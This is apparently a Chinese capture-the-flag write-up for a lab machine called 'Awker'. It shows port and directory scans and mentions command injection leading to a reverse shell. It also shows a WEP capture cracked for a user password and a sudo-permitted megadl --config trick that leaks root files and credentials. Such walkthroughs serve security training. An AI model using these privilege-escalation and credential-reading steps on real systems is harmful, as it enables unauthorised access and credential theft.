Awker

简单写一下

信息收集

root@kali:~# nmap 192.168.100.56 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-06 08:41 EDT
Nmap scan report for 192.168.100.56
Host is up (0.00065s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:83:CD:4D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.95 seconds

80: 是一个phpinfo

image-20250506204252227
image-20250506204252227

root@kali:~# gobuster dir -x php,txt,html,js -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://192.168.100.56
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.100.56
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,js
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 85768]
/.html                (Status: 403) [Size: 279]
/learning.php         (Status: 200) [Size: 4891]
Progress: 17591 / 1102800 (1.60%)^C

image-20250506204407864
image-20250506204407864

目录扫出来一个/learning.php 直接命令注入

image-20250506204450127
image-20250506204450127

直接反弹 shell

User提权

www-data@Awker:/var/www/html$ find / -readable -type f 2>/dev/null|grep -Pv "pro
c|sys|boot|usr|run|etc|var|snap"
/home/welcome/WEP-capture.pcap
/home/welcome/.bash_logout
/home/welcome/.bashrc
/home/welcome/.profile

welcome 家目录里有个WEP流量包 直接拉到本地 aircrack 解一下

aircrack-ng WEP-capture.pcap

                                                         Aircrack-ng 1.7


                                           [00:00:01] Tested 60016 keys (got 17273 IVs)

   KB    depth   byte(vote)
    0    0/  1   4D(28160) 24(23808) 58(23552) 44(22528) B7(22528) 94(21760) D2(21504) 00(20992) 39(20992) 71(20992)
    1    4/ 34   59(21760) E1(21504) 5B(21504) B0(20992) 56(20736) 98(20736) A6(20736) B4(20480) EF(20480) 86(20480)
    2   36/ 45   04(19712) 16(19456) 41(19456) 56(19456) 7B(19456) 7C(19456) 81(19456) E6(19456) F1(19456) F2(19456)
    3   14/ 40   45(20992) D3(20992) 94(20736) 04(20736) 0F(20480) 58(20480) B2(20480) 00(20480) 1E(20224) 20(20224)
    4    0/  1   59(27648) 6F(23040) 25(22016) 20(21760) 38(21760) 30(21504) 53(21504) 67(21504) 84(21504) DB(21504)

                     KEY FOUND! [ 4D:59:4B:45:59 ] (ASCII: MYKEY )
    Decrypted correctly: 100%

获得了一个 MYKEY 是welcome 用户的密码

UserFlag
welcome@Awker:~$ cat user.txt
flag{user-4e9e3333bfeff9fd6a40fca5ce9b05b7}

Root提权

welcome@Awker:~$ sudo -l
Matching Defaults entries for welcome on Awker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/s
bin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on Awker:
    (ALL) NOPASSWD: /usr/bin/megadl
welcome@Awker:~$ megadl -help
Usage:
  megadl [OPTION…] - download exported files from mega.nz

Help Options:
  -h, --help                  Show help options
  --help-all                  Show all help options

Application Options:
  --path=PATH                 Local directory or file name, to save data to
  --no-progress               Disable progress bar
  --print-names               Print names of downloaded files
  --choose-files              Choose which files to download when downloading fo
lders (interactive)
  --disable-resume            Disable resume when downloading file
  -u, --username=USERNAME     Account username (email)
  -p, --password=PASSWORD     Account password
  --no-ask-password           Never ask interactively for a password
  --reload                    Reload filesystem cache
  --limit-speed=SPEED         Limit transfer speed (KiB/s)
  --proxy=PROXY               Proxy setup string
  --config=PATH               Load configuration from a file
  --ignore-config-file        Disable loading .megarc
  --debug=OPTS                Enable debugging output
  --version                   Show version information

megadl 是用于mega 网盘下载的

可以指定 config 那就直接读 root flag 了

welcome@Awker:~$ sudo /usr/bin/megadl --config=/root/root.txt
ERROR: Failed to open config file: /root/root.txt: Key file contains line “flag{
root-e93a188c288106b24060679d47cc630f}” which is not a key-value pair, group, or
 comment

拿 shell 的话

先尝试读 root 有没有公钥

welcome@Awker:~$ sudo /usr/bin/megadl --config=/root/.ssh/authorized_keys
ERROR: Failed to open config file: /root/.ssh/authorized_keys: Key file contains
 line “root:16b02f836fadea32dea19a110e3d588d” which is not a key-value pair, gro
up, or comment

发现也是长得不太像公钥 应该是 root 的密码 直接su 上去就行

也可以在 mega 上上传一个计划任务的文件 然后在吧唧里拉下来使用--path= 指定保存路径

RootFlag
root@Awker:~# cat root.txt
flag{root-e93a188c288106b24060679d47cc630f}